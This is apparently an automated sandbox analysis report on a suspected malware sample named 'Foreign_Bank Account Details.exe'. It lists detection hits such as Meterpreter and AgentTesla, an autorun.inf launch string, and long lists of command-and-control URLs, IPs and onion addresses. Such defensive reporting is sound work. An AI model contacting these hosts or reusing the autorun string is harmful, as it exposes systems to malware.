Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D4ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4B030 FindNextFileW,FindClose,FindFirstFileW, 42_2_00007FF650D4B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D72504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D72504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 42_2_00007FF650CFF810

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402267
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004022E9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402379
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004021F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004021F3

Networking:

Yara detected PasteDownloader
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.11.20:49812 -> 116.0.120.83:587
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://888888.2288.org/Monitor_INI
Source: Malware configuration extractor URLs: http://te.platrium.com/pte.aspx
Source: Malware configuration extractor URLs: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.php/?email=kevind@hollywoodwoodwork.com"target="_blank
Source: Malware configuration extractor URLs: http://config.juezhao123.com/c.ashx?ver=&c=
Source: Malware configuration extractor URLs: http://brembotembo.com/2.dat
Source: Malware configuration extractor URLs: http://%s:%i%s?mod=cmd
Source: Malware configuration extractor URLs: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: Malware configuration extractor URLs: http://checkip.dyndns.org/
Source: Malware configuration extractor URLs: http://whenyouplaygood.com/s/gate.php?a");f["\x73\x65\x6e\x64"]();eval(f["responsetext"
Source: Malware configuration extractor URLs: http://www.nba.com
Source: Malware configuration extractor URLs: http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/
Source: Malware configuration extractor URLs: http://www.agendagyn.com/media/fotos/2010/
Source: Malware configuration extractor URLs: http://www.thon-samson.be/js/_notes/
Source: Malware configuration extractor URLs: http://anomaniez.blogspot.com/
Source: Malware configuration extractor URLs: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: Malware configuration extractor URLs: http://binyousafindustries.com/fonts/jo/mops.exe
Source: Malware configuration extractor URLs: http://%s/features.php
Source: Malware configuration extractor URLs: http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56
Source: Malware configuration extractor URLs: http://iranvision1404.com/ss/info/redebit_transactions/terms/kohc-xuxo_lcxty-av6e
Source: Malware configuration extractor URLs: http://92.222.7.
Source: Malware configuration extractor URLs: http://brembotembo.com/1.dat
Source: Malware configuration extractor URLs: http://ow.ly/QoHbJ
Source: Malware configuration extractor URLs: http://%s/v_install?sid=16045&start=1&guid=$__GUID&sig=$__SIG&ovr=$__OVR&browser=$__BROWSER&label=%s&aux=%d
Source: Malware configuration extractor URLs: http://aancyber77.blogspot.com/
Source: Malware configuration extractor URLs: http://2010-kpss.blogspot.com/
Source: Malware configuration extractor URLs: http://www.sacbarao.kinghost.net/
Source: Malware configuration extractor URLs: http://downloadfilesldr.com/allfile.jpg
Source: Malware configuration extractor URLs: http://5starvideos.com/main/K
Source: Malware configuration extractor URLs: http://sf3q2wrq34.ddns.net
Source: Malware configuration extractor URLs: http://www.ip2location.com/
Source: Malware configuration extractor URLs: http://88888888.7766.org/ExeIni
Source: Malware configuration extractor URLs: http://worm.ws/
Source: Malware configuration extractor URLs: http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn
Source: Malware configuration extractor URLs: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiyw
Source: Malware configuration extractor URLs: http://dudethisishowwedoitallnightlong.2myip.net
Source: Malware configuration extractor URLs: http://dmww.dmcast.com/script/update.asp?version=%s
Source: Malware configuration extractor URLs: http://docs.herobo.com
Source: Malware configuration extractor URLs: http://directplugin.com/dialers/
Source: Malware configuration extractor URLs: http://www.xpassgenerator.com/software/d
Found Tor onion address
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: $https://djdkduep62kz4nzx.onion.to/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://babukq4e2p4wu4iq.onion
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: Open link in tor browser: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: torlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: Qtorlink='http://oc6mkf4efqrjp2ue6qp6vmz4ofyjmlo6dtqiklqb2q546bnqeu66tbyd.onion'
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.11.20:49812 -> 116.0.120.83:587
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1hKAWruhccvaKl722JOqs1briWjn1s8ks HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/g7dge6jvaanlcs7829hvlmboru4ioabe/1634024250000/16524389560697724177/*/1hKAWruhccvaKl722JOqs1briWjn1s8ks?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0c-28-docs.googleusercontent.comConnection: Keep-Alive
Uses SMTP (mail sending)
Source: global traffic TCP traffic: 192.168.11.20:49812 -> 116.0.120.83:587
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://185.165.29.36/11.mov
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://185.165.30.31
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/kvsn/image.png
Source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp String found in binary or memory: http://185.172.110.217/robx/remit.jpg
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://185.180.197.66/2vjdz6jaqzeiq.php
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://185.183.98.14/fontsupdate.php
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://185.185.25.175/ref45.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://185.22.153.9/desktop-u2u8a6r/nature/prey.dot
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.225.19.240/dmenconsvc.dll
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.209/xcel/copy/xel.phpmethod=post
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://185.236.231.210/test/en/dsf.php
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://185.239.242.71
Source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp String found in binary or memory: http://185.243.215.213/sys_info.vbs
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://185.250.149.128/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://185.38.142.91/awo/next.php
Source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.2/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://185.82.218.30/44313
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp String found in binary or memory: http://185.99.2.83/frte1z0xiwu8q.php
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://187.157.146.147/m0rpheus/index.php?mon=
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://188.127.254.159/
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp String found in binary or memory: http://188.166.41.131/momo.php
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp String found in binary or memory: http://189.1.168.10/~festaefe/1024bit.php
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.190/
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://190.14.37.191/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://191.101.239.86/root/migytkyt5bberd
Source: MpSigStub.exe, 00000023.00000003.18324547737.0000015B1B0B1000.00000004.00000001.sdmp String found in binary or memory: http://192.168.0.108/download.ps1
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://192.168.1.60/6464.exe
Source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp String found in binary or memory: http://192.168.100.5/00ButtonTest.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp String found in binary or memory: http://192.168.213.131/logo.doc
Source: MpSigStub.exe, 00000023.00000003.18284892419.0000015B1AF67000.00000004.00000001.sdmp String found in binary or memory: http://192.168.88.
Source: MpSigStub.exe, 00000023.00000003.18430078945.0000015B1C0AE000.00000004.00000001.sdmp String found in binary or memory: http://192.189.25.17/cgbin/ukbros
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://192.227.228.85/.--...........................................................................
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://192.236.147.189/execute/uploads/Excel.sct
Source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.134/document_m.doc
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp String found in binary or memory: http://192.3.141.173/word/
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://192.3.152.134/nda/document.doc
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://192.3.22.5/.-................................................................................
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://193.107.19.250:89/users/gigi_eli/ax.php
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp String found in binary or memory: http://193.203.202.55/
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://193.38.55.92/gfmppbpq
Source: MpSigStub.exe, 00000023.00000003.18345035369.0000015B1B176000.00000004.00000001.sdmp String found in binary or memory: http://194.145.227.21sys=$(date
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://194.178.112.202
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.101/api.php
Source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp String found in binary or memory: http://194.5.249.107/2nquxqz2ok4a45l.php
Source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp String found in binary or memory: http://195.123.210.174/
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp String found in binary or memory: http://195.123.219.21/campo/t3/t3d
Source: MpSigStub.exe, 00000023.00000003.18310002934.0000015B1B40D000.00000004.00000001.sdmp String found in binary or memory: http://195.123.220.249/campo/t2/t2dcdddebp%&c
Source: MpSigStub.exe, 00000023.00000003.18349004213.0000015B1A9DB000.00000004.00000001.sdmp String found in binary or memory: http://195.123.235.1/
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://195.225.176.34/ad/
Source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp String found in binary or memory: http://195.226.220.112/~admin/.
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp String found in binary or memory: http://195.5.116.250/ex/static.php
Source: MpSigStub.exe, 00000023.00000003.18302834450.0000015B1BFE8000.00000004.00000001.sdmp String found in binary or memory: http://195.78.108.
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/dl/dl.php?
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp String found in binary or memory: http://195.95.218.173/troys/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp String found in binary or memory: http://198.12.127.217/.--------------------------.--------------........-...................-/_.....
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://198.23.212.187/_......................................_......................-/
Source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp String found in binary or memory: http://198.23.213.25/document.doc
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp String found in binary or memory: http://198.23.251.121/_--_-_---_-_--__------_.......................................................
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://198.46.132.185/.--_------------------------------------------.-----/
Source: MpSigStub.exe, 00000023.00000003.18318671001.0000015B1C4A2000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://198.46.201.115/.-...................................................-.-/..-------------------
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp String found in binary or memory: http://198.50.114.16
Source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp String found in binary or memory: http://1animalsnames.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://1bestgate.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18433124639.0000015B1B6E2000.00000004.00000001.sdmp String found in binary or memory: http://1lxtjdias-pod:8080/stage3.exe
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://200.159.128.
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/duiss/duiss
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://200.63.45.105/sado/sado.exe
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://200.74.240.151/saturno/w7.txt
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://200.74.240.151/saturno/w8.txt
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp String found in binary or memory: http://200.98.142.117/sys02/01.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp String found in binary or memory: http://2010-kpss.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18320270470.0000015B1B515000.00000004.00000001.sdmp String found in binary or memory: http://2012-wallpaper-hd.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://2014secimleriturkiye.blogspot.com/
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp String found in binary or memory: http://202.104.11.94
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://203.199.200.61
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://205.177.124.74/
Source: MpSigStub.exe, 00000023.00000003.18326614272.0000015B1A717000.00000004.00000001.sdmp String found in binary or memory: http://205.185.116.78/
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/FQL66n
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/b9xbb3
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/files/may13.bin
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://205.185.122.246/khkwZF
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/1t1nnx
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/pqbtwj
Source: MpSigStub.exe, 00000023.00000003.18299377795.0000015B1AEE3000.00000004.00000001.sdmp String found in binary or memory: http://205.185.125.104/yxsz8k
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://205.252.24.246/
Source: MpSigStub.exe, 00000023.00000003.18335432095.0000015B1A956000.00000004.00000001.sdmp String found in binary or memory: http://207.154.225.82/report.json?type=mail&u=$muser&c=
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.35/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://207.226.171.36/
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp String found in binary or memory: http://207.226.177.108/sc.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://207.58.162.237/spy/cartao.scr
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp String found in binary or memory: http://208.115.201.245/ideal.zip
Source: MpSigStub.exe, 00000023.00000003.18336414128.0000015B1BF22000.00000004.00000001.sdmp String found in binary or memory: http://208.95.104.
Source: MpSigStub.exe, 00000023.00000003.18344667874.0000015B1B06E000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/Q-2/
Source: MpSigStub.exe, 00000023.00000003.18340752801.0000015B1B72C000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/dy5434app14.exe
Source: MpSigStub.exe, 00000023.00000003.18332554033.0000015B1C0AF000.00000004.00000001.sdmp String found in binary or memory: http://209.141.61.124/q-2/img_0107803.exe
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.213/
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://209.62.108.220/
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp String found in binary or memory: http://20vp.cn/moyu/
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://210302.top/
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://212.109.196.67/gateway.php
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp String found in binary or memory: http://212.129.31.67
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exe
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp String found in binary or memory: http://212.192.241.203/xx/kl.exex
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp String found in binary or memory: http://212.237.58.208/0607/
Source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp String found in binary or memory: http://212.86.115.71/template.doc
Source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp, MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp String found in binary or memory: http://213.159.213.195/d.exe
Source: MpSigStub.exe, 00000023.00000003.18285687047.0000015B1B29A000.00000004.00000001.sdmp String found in binary or memory: http://216.170.114.73/
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp String found in binary or memory: http://216.172.154.248/pic/img.js
Source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp String found in binary or memory: http://216.172.172.40/~agora546/cardoso/dilma.zip
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp String found in binary or memory: http://217.73.6
Source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117
Source: MpSigStub.exe, 00000023.00000003.18298772777.0000015B1A8DA000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.60/arty.exe
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp String found in binary or memory: http://217.8.117.63/
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp String found in binary or memory: http://218.204.253.145/setup.exe
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.2/Download
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp String found in binary or memory: http://220.73.162.4/Download
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://22112017.flashplayeron.com
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp String found in binary or memory: http://223.244.225.3:
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp String found in binary or memory: http://22y456.com/
Source: MpSigStub.exe, 00000023.00000003.18334190857.0000015B1A60C000.00000004.00000001.sdmp String found in binary or memory: http://23.244.141.185/cgi-bin
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp String found in binary or memory: http://23.249.163.163/qwerty.exe
Source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp String found in binary or memory: http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/
